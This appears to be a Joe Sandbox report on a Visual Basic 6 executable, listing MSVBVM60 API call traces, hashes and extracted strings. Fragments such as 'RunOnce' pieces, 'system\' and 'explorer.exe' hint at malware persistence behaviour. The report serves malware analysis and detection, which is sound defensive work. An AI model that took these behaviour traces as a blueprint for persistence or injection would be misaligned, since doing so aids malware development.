                                                                                    • Instruction ID: ae26ad25c27fd2aa879063d40509198e82445ba020206e85d6646bf00855608d
                                                                                    • Opcode Fuzzy Hash: 24d6d6b17887c0f3c917ea1074893c9453fe825b7dc9271a4a55e95ec63938c9
                                                                                    • Instruction Fuzzy Hash: AF125871E002189FDB14DFE4DD88AEEBBB5FB48301F10412AE506B72A0EB745985CF69
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6,?,?,?,?,00000000,Function_000032B6), ref: 0042206E
                                                                                    • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042209B
                                                                                    • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,Function_000032B6), ref: 004220AA
                                                                                    • __vbaStrCat.MSVBVM60(00408794,?,?,00000000,?,00000000,Function_000032B6), ref: 004220C0
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 004220CB
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                    • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,Function_000032B6), ref: 004220DD
                                                                                    • __vbaStrCat.MSVBVM60(00408794,?,?,00000000,?,00000000,Function_000032B6), ref: 004220F3
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 004220FE
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,00000000,?,00000000,?,00000000,Function_000032B6), ref: 0042211F
                                                                                    • __vbaStrCat.MSVBVM60(00408794,00000006,00000006,?,00000000,?,00000000,Function_000032B6), ref: 00422144
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042214F
                                                                                    • #580.MSVBVM60(00000000,?,00000000,?,00000000,Function_000032B6), ref: 00422156
                                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042215F
                                                                                    • #598.MSVBVM60(?,00000000,?,00000000,Function_000032B6), ref: 0042216C
                                                                                    • __vbaNew2.MSVBVM60(004049C0,0042C060,0042C0F0,?,00000000,?,00000000,Function_000032B6), ref: 0042219D
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 004221D7
                                                                                    • __vbaObjSet.MSVBVM60(?,?), ref: 004221F8
                                                                                    • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0042C0F0,00000000,?,00000020), ref: 0042221E
                                                                                    • #598.MSVBVM60(?,00000000,Function_000032B6), ref: 0042222E
                                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,Function_000032B6), ref: 00422250
                                                                                    • __vbaStrCat.MSVBVM60(00408794,?,00000000,?,00000000,Function_000032B6), ref: 0042226C
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000,Function_000032B6), ref: 00422277
                                                                                    • __vbaFreeStr.MSVBVM60(00000000,?,00000000,Function_000032B6), ref: 00422286
                                                                                    • #598.MSVBVM60(?,00000000,Function_000032B6), ref: 00422293
                                                                                    • #648.MSVBVM60(0000000A), ref: 004222B2
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 004222C1
                                                                                    • __vbaStrCat.MSVBVM60(00408794,?), ref: 004222D7
                                                                                    • __vbaFreeStr.MSVBVM60(004226E7), ref: 004226D7
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 004226E0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                    • String ID: 5
                                                                                    • API String ID: 3012955283-2226203566
                                                                                    • Opcode ID: b38d2dec9a9c5a407f4ed27c153f55b07beb21e57233ec5c09002560f545ea4e
                                                                                    • Instruction ID: 514902ae826528d268cef2b3f75eb0ca97d7031ef370423ce81c1c411bdef8a6
                                                                                    • Opcode Fuzzy Hash: b38d2dec9a9c5a407f4ed27c153f55b07beb21e57233ec5c09002560f545ea4e
                                                                                    • Instruction Fuzzy Hash: AD02D675900258EFDB04DFA0EE48BEEBB75FF48305F108169E502B72A0DBB45A45DB68
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • #600.MSVBVM60(?,00000002), ref: 0040C111
                                                                                    • __vbaFreeStrList.MSVBVM60(00000003,?,?,?), ref: 0040C12B
                                                                                    • __vbaFreeVar.MSVBVM60 ref: 0040C137
                                                                                    • #580.MSVBVM60(00000000,00000027), ref: 0040CA1A
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA32
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CA3D
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CA57
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CA62
                                                                                      • Part of subcall function 0042A090: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CA73,80000002,00000000), ref: 0042A0AE
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0DB
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0E7
                                                                                      • Part of subcall function 0042A090: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A0F3
                                                                                      • Part of subcall function 0042A090: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042A102
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,004032B6), ref: 0042A11B
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(80000002,00000000,?,?,?,00000000,004032B6), ref: 0042A12B
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A139
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042A142
                                                                                      • Part of subcall function 0042A090: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 0042A153
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(?,?,00000000,?,?,?,00000000,004032B6), ref: 0042A162
                                                                                      • Part of subcall function 0042A090: __vbaStrToAnsi.MSVBVM60(00000001,?,00000000,00000001,00000000,?,?,?,00000000,004032B6), ref: 0042A175
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(00000000,00000000,?,?,?,00000000,004032B6), ref: 0042A185
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A193
                                                                                      • Part of subcall function 0042A090: __vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,004032B6), ref: 0042A1A1
                                                                                      • Part of subcall function 0042A090: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,?,?,00000000,004032B6), ref: 0042A1B1
                                                                                      • Part of subcall function 0042A090: __vbaSetSystemError.MSVBVM60(?,?,00000000,004032B6), ref: 0042A1CA
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(0042A207,?,00000000,004032B6), ref: 0042A1EE
                                                                                      • Part of subcall function 0042A090: __vbaFreeStr.MSVBVM60(?,00000000,004032B6), ref: 0042A1F7
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CA7D
                                                                                    • __vbaStrCat.MSVBVM60( RO,00000000), ref: 0040CA99
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CAA4
                                                                                    • __vbaStrCat.MSVBVM60(Once,00000000,00000000,00000000), ref: 0040CABD
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CAC8
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,80000002,00000000), ref: 0040CAE3
                                                                                      • Part of subcall function 004296C0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CAFD,0042C0D4), ref: 004296DE
                                                                                      • Part of subcall function 004296C0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042970E
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 00429723
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 0042973D
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(00000000,?,?,?,00000000,004032B6), ref: 00429744
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042974F
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(explorer.exe, ,00000000,?,?,?,00000000,004032B6), ref: 00429761
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042976C
                                                                                      • Part of subcall function 004296C0: __vbaStrCat.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429779
                                                                                      • Part of subcall function 004296C0: __vbaStrMove.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429784
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 00429792
                                                                                      • Part of subcall function 004296C0: __vbaStrCopy.MSVBVM60(?,00000000,?,?,?,00000000,004032B6), ref: 004297A0
                                                                                      • Part of subcall function 004296C0: __vbaFreeStrList.MSVBVM60(00000007,?,?,?,00000000,?,?,?,00000000,?,?,?,?,00000000), ref: 004297D9
                                                                                      • Part of subcall function 004228E0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,0040CB10,00000000,0042C0D4), ref: 004228FE
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004032B6), ref: 0042292B
                                                                                      • Part of subcall function 004228E0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 0042293A
                                                                                      • Part of subcall function 004228E0: #648.MSVBVM60(0000000A), ref: 00422959
                                                                                      • Part of subcall function 004228E0: __vbaFreeVar.MSVBVM60 ref: 00422968
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60(?), ref: 0042297C
                                                                                      • Part of subcall function 004228E0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 0042298A
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 0042299A
                                                                                      • Part of subcall function 004228E0: #570.MSVBVM60(00000000), ref: 004229A1
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229AE
                                                                                      • Part of subcall function 004228E0: __vbaLenBstr.MSVBVM60(0040545C), ref: 004229E5
                                                                                      • Part of subcall function 004228E0: #525.MSVBVM60(00000000), ref: 004229EC
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60 ref: 004229F7
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A07
                                                                                      • Part of subcall function 004228E0: __vbaFileSeek.MSVBVM60(00000004,00000000), ref: 00422A12
                                                                                      • Part of subcall function 004228E0: __vbaI2I4.MSVBVM60 ref: 00422A22
                                                                                      • Part of subcall function 004228E0: __vbaGet3.MSVBVM60(00000000,?,00000000), ref: 00422A2F
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(?), ref: 00422A4A
                                                                                      • Part of subcall function 004228E0: __vbaStrCopy.MSVBVM60 ref: 00422A68
                                                                                      • Part of subcall function 004228E0: __vbaStrMove.MSVBVM60(00000003), ref: 00422A79
                                                                                      • Part of subcall function 004228E0: #616.MSVBVM60(00000000), ref: 00422A80
                                                                                    • #580.MSVBVM60(00000000,00000027,00000000,00000000,0042C0F4,00000000,0042C0D4), ref: 0040CB52
                                                                                    • __vbaStrCat.MSVBVM60( MR,00000000,0042C110,0042C114,0042C118,00000000,0042C0D4), ref: 0040CB7A
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CB85
                                                                                    • __vbaFreeStr.MSVBVM60(00000000), ref: 0040CB94
                                                                                    • __vbaStrCopy.MSVBVM60(80000002,00000000,00000000,80000002,00000000,00000000), ref: 0040CBE5
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CBF9
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC06
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC16
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC2E
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CC42
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC4F
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CC5F
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC77
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CC8B
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CC98
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCA8
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CCC0
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CCD4
                                                                                      • Part of subcall function 00415AF0: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,0040CB29,0042C0F4,00000000,0042C0D4), ref: 00415B0E
                                                                                      • Part of subcall function 00415AF0: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00415B3E
                                                                                      • Part of subcall function 00415AF0: #580.MSVBVM60(00000000,00000000,00000000,?,?,?,00000000,004032B6), ref: 00415B6A
                                                                                      • Part of subcall function 00415AF0: #529.MSVBVM60(00004008), ref: 00415B88
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60(66107559,00000000,00000000), ref: 00425A0A
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A12
                                                                                      • Part of subcall function 004259A0: __vbaOnError.MSVBVM60(00000001), ref: 00425A16
                                                                                      • Part of subcall function 004259A0: #648.MSVBVM60(0000000A), ref: 00425A2E
                                                                                      • Part of subcall function 004259A0: __vbaFreeVar.MSVBVM60 ref: 00425A3D
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60(?), ref: 00425A4F
                                                                                      • Part of subcall function 004259A0: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00425A59
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425A61
                                                                                      • Part of subcall function 004259A0: #570.MSVBVM60(00000000), ref: 00425A64
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425A74
                                                                                      • Part of subcall function 004259A0: __vbaStrCopy.MSVBVM60 ref: 00425A93
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60(?), ref: 00425AA9
                                                                                      • Part of subcall function 004259A0: __vbaFreeStr.MSVBVM60 ref: 00425AAE
                                                                                      • Part of subcall function 004259A0: __vbaLenBstr.MSVBVM60(0040545C), ref: 00425AC2
                                                                                      • Part of subcall function 004259A0: #525.MSVBVM60(00000000), ref: 00425AC9
                                                                                      • Part of subcall function 004259A0: __vbaStrMove.MSVBVM60 ref: 00425AD4
                                                                                      • Part of subcall function 004259A0: __vbaI2I4.MSVBVM60 ref: 00425AD9
                                                                                      • Part of subcall function 004259A0: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 00425AE3
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CCE1
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CCF1
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD09
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD1B
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CD26
                                                                                      • Part of subcall function 004115D0: __vbaLenBstr.MSVBVM60(00000000), ref: 0041160D
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,?), ref: 00411658
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,?), ref: 00411663
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,?), ref: 0041166A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,?), ref: 004116C8
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,?), ref: 004116D1
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 00411701
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0041170C
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 00411713
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CD3B
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040CD42
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CD4D
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD5A
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CD72
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CD8A
                                                                                    • __vbaStrCat.MSVBVM60(system\,00000000), ref: 0040CD9C
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CDA7
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,?), ref: 0041176F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,?), ref: 00411778
                                                                                      • Part of subcall function 004115D0: #631.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117A9
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 004117B4
                                                                                      • Part of subcall function 004115D0: #516.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 004117BB
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 0041180F
                                                                                      • Part of subcall function 004115D0: __vbaFreeVar.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411818
                                                                                      • Part of subcall function 004115D0: #537.MSVBVM60(-0000000C,?,?,?,00000002,?,?,00000002,?,?,?), ref: 00411853
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411864
                                                                                      • Part of subcall function 004115D0: __vbaStrCat.MSVBVM60(00000000,?,?,00000002,?,?,00000002,?,?,?), ref: 00411867
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411872
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(?,?,00000002,?,?,00000002,?,?,?), ref: 00411877
                                                                                    • __vbaStrMove.MSVBVM60(?,00000000), ref: 0040CDBC
                                                                                    • __vbaStrCat.MSVBVM60(00000000), ref: 0040CDC3
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CDCE
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CDDB
                                                                                    • __vbaFreeStrList.MSVBVM60(00000004,?,?,?,?), ref: 0040CDF3
                                                                                    • __vbaStrCat.MSVBVM60(at.,00000000), ref: 0040CE0F
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CE1A
                                                                                    • __vbaStrCat.MSVBVM60(00000000,00000000), ref: 0040CE28
                                                                                    • __vbaStrMove.MSVBVM60 ref: 0040CE33
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE40
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE50
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE68
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 0041189C
                                                                                      • Part of subcall function 004115D0: __vbaFreeStr.MSVBVM60(004118D5), ref: 004118CE
                                                                                    • __vbaStrMove.MSVBVM60(?), ref: 0040CE7C
                                                                                    • __vbaStrCopy.MSVBVM60 ref: 0040CE89
                                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040CE99
                                                                                      • Part of subcall function 00411F00: __vbaChkstk.MSVBVM60(00000000,004032B6,?,?,?,?,0040CEB3,0042C160), ref: 00411F1E
                                                                                      • Part of subcall function 00411F00: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004032B6), ref: 00411F4E
                                                                                      • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(0040CEB3,?,?,?,00000000,004032B6), ref: 00411F69
                                                                                      • Part of subcall function 00411F00: __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F7D
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60(?,?,?,00000000,004032B6), ref: 00411F86
                                                                                      • Part of subcall function 00411F00: __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004032B6), ref: 00411F97
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?,004156AF), ref: 0041565A
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415667
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415674
                                                                                      • Part of subcall function 00411F00: __vbaAryUnlock.MSVBVM60(?), ref: 00415681
                                                                                      • Part of subcall function 00411F00: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041568D
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 00415696
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 0041569F
                                                                                      • Part of subcall function 00411F00: __vbaFreeStr.MSVBVM60 ref: 004156A8
                                                                                    • __vbaObjSet.MSVBVM60(?,00000000), ref: 0040CEE1
                                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,00407978,0000005C), ref: 0040CF27
                                                                                    • __vbaFreeObj.MSVBVM60 ref: 0040CF42
                                                                                    • __vbaFreeStr.MSVBVM60(0040CFB1), ref: 0040CFA1
                                                                                    • __vbaFreeStr.MSVBVM60 ref: 0040CFAA
                                                                                      • Part of subcall function 004115D0: __vbaErase.MSVBVM60(004065BC,0042C078,0000000A,-00000061,660E0EBE), ref: 00411B74
                                                                                      • Part of subcall function 004115D0: __vbaRedim.MSVBVM60(00000000,00000024,0042C078,004065BC,00000001,00000003,00000001), ref: 00411B97
                                                                                      • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411BAA
                                                                                      • Part of subcall function 004115D0: __vbaGenerateBoundsError.MSVBVM60 ref: 00411BCE
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411BFE
                                                                                      • Part of subcall function 004115D0: __vbaStrMove.MSVBVM60(?), ref: 00411C14
                                                                                      • Part of subcall function 004115D0: __vbaStrCopy.MSVBVM60 ref: 00411C1A
                                                                                      • Part of subcall function 004115D0: __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 00411C2C
                                                                                      • Part of subcall function 004115D0: __vbaAryUnlock.MSVBVM60(?), ref: 00411C3E
                                                                                      • Part of subcall function 004115D0: __vbaAryLock.MSVBVM60(?,00000000), ref: 00411C4F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.270471051.0000000000402000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.270464741.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270468015.0000000000401000.00000040.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270634178.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.270646029.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_Lg3gn9y1Cj.jbxd
                                                                                    Similarity
                                                                                    • API ID: __vba$Free$Move$Copy$List$Error$Bstr$ChkstkUnlock$#516#580#631AnsiFileSystemUnicode$#525#570#648LockOpen$#529#537#600#616BoundsCheckDestructEraseGenerateGet3Get4HresultRedimSeek
                                                                                    • String ID: MR$ RO$Once$at.$system\
                                                                                    • API String ID: 2909355650-3550570743
                                                                                    • Opcode ID: 1a787a17832883457bb363a360e8e57ce220131458789b833322a31e1582a5d4
                                                                                    • Instruction ID: 5352e845ad87aaf5050473855ece2fd4f397f64d24d7448873b9de5ca92ad3b4
                                                                                    • Opcode Fuzzy Hash: 1a787a17832883457bb363a360e8e57ce220131458789b833322a31e1582a5d4
                                                                                    • Instruction Fuzzy Hash: E0F14F71A00248EFDB04EFA0EE89AEE7775EF48304F108169F606B72A1DB745A45CF59
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    APIs
                                                                                    • __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041EB3E
                                                                                    • __vbaOnError.MSVBVM60(00000001,?,?,?,00000000,Function_000032B6), ref: 0041EB6E
                                                                                    • __vbaSetSystemError.MSVBVM60(00000005,00000000,00000002,?,?), ref: 0041EBB0
                                                                                    • __vbaSetSystemError.MSVBVM60(00000040,00004000), ref: 0041EBE8
                                                                                    • __vbaSetSystemError.MSVBVM60(?,FFFFFFFF,?,00004000), ref: 0041EC19
                                                                                    • __vbaSetSystemError.MSVBVM60(?,?,00000020), ref: 0041ECA0
                                                                                      • Part of subcall function 0041F150: __vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041F16E
                                                                                      • Part of subcall function 0041F150: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041F19E
                                                                                      • Part of subcall function 0041F150: #537.MSVBVM60(00000000,?,?,?,00000000,Function_000032B6), ref: 0041F1AD
                                                                                      • Part of subcall function 0041F150: #606.MSVBVM60(000000FF,00000008), ref: 0041F1C6
                                                                                      • Part of subcall function 0041F150: __vbaStrMove.MSVBVM60 ref: 0041F1D1
                                                                                      • Part of subcall function 0041F150: __vbaFreeVar.MSVBVM60 ref: 0041F1DA
                                                                                      • Part of subcall function 0041F150: __vbaStrToAnsi.MSVBVM60(?,?), ref: 0041F1F5
                                                                                      • Part of subcall function 0041F150: __vbaSetSystemError.MSVBVM60(00000000), ref: 0041F201
